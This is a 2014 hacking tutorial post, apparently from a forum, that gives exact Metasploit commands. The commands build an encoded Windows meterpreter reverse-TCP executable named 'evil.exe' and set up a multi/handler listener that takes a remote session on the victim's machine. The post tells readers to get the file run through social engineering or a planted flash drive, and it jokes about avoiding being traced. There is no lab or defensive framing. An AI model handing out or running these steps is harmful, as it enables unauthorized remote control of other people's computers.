Metasploit Payload: What exactly is metasploit? Metasploit is a framework used for storing, deploying, and creating exploits. An exploit is a piece of code which can interact with other programs to let the attacker (you) execute bits of code on the victims computer. It also has a wonderful tool known as msfpayload. What is msfpayload? msf payload is used in conjunction with msfcli and msfenocde. Together, they are a set of tools which creates a file that connects back to your computer, encodes the file, and sets up a listener for said file. This method completely bypasses the need for exploits, but requires social engineering skills to somehow get your file on their computer and for them to execute it. (or just sneak a flash drive in while their not looking and execute it for them, but I dont recommend that.) Sounds great right? so how do you do it? ||Tutorial starts here|| I will be using Backtrack 5 R3, and using msfconsole. To start it off, update msf by starting a terminal and running msfupdate. It will say Updated to revision ##### when finished. Now execute msfconsole (which will take a few moments to load. After it shows the msf banner, it will give you the msf prompt msf >. Type show payloads. This gives you a list of all the payloads available. We are going to use windows/meterpreter/reverse_tcp Type use windows/meterpreter/reverse_tcp and it will bring you into that module. type info to see what options are required and other useful information. We see that there are three options needed, EXITFUNC, LHOST, and LPORT. EXITFUNC is just how the program will show up on windows, dont really need to care about that. LHOST is your IP address, so the program will know where to connect back to, and LPORT is the port it will connect back on. EXITFUNC and LPORT already have default values placed in them, which work fine and we dont need to change. LHOST on the other hand, does need an option. This is your IP address. If you are performing this over a LAN network, then you just need your LAN IP, such as 192.168.2.5. If you are performing this over WAN, use your WAN address and have correct port forwarding (and pray nobody traces it back to you). We set LHOST by typing set LHOST 192.168.2.5. If we run info again it shows our LHOST as the ip we put in. So with all that in order, now we just type generate -e x86/shikata_ga_nai -i 30 -t exe -f evil.exe which will create the file in your Home folder. Take that file, and copy it on to a flash drive. Now for the second part (much quicker then the first). Go back to your terminal and type back, to be brought back to the main msf menu. We are going to use the handler to listen for connections, so type use exploit/multi/handler to set the module. Now to set the options, type exactly in the following in order: set PAYLOAD windows/meterpreter/reverse_tcp (the payload we generated earlier) set LHOST 192.168.2.5 (your ip address, whatever that may be) set LPORT 4444 (the default port) exploit and the handler is started. When somebody executes that file we made earlier, it connects back to your computer, and the listener we just created handles that connect back. When somebody executes it, you will have a session created. Just type sessions 1 and you will connect. For More Tutorials go to : learn2hack.pw/
Posted on: Sun, 12 Oct 2014 14:05:42 +0000
Recently Viewed Topics
© 2015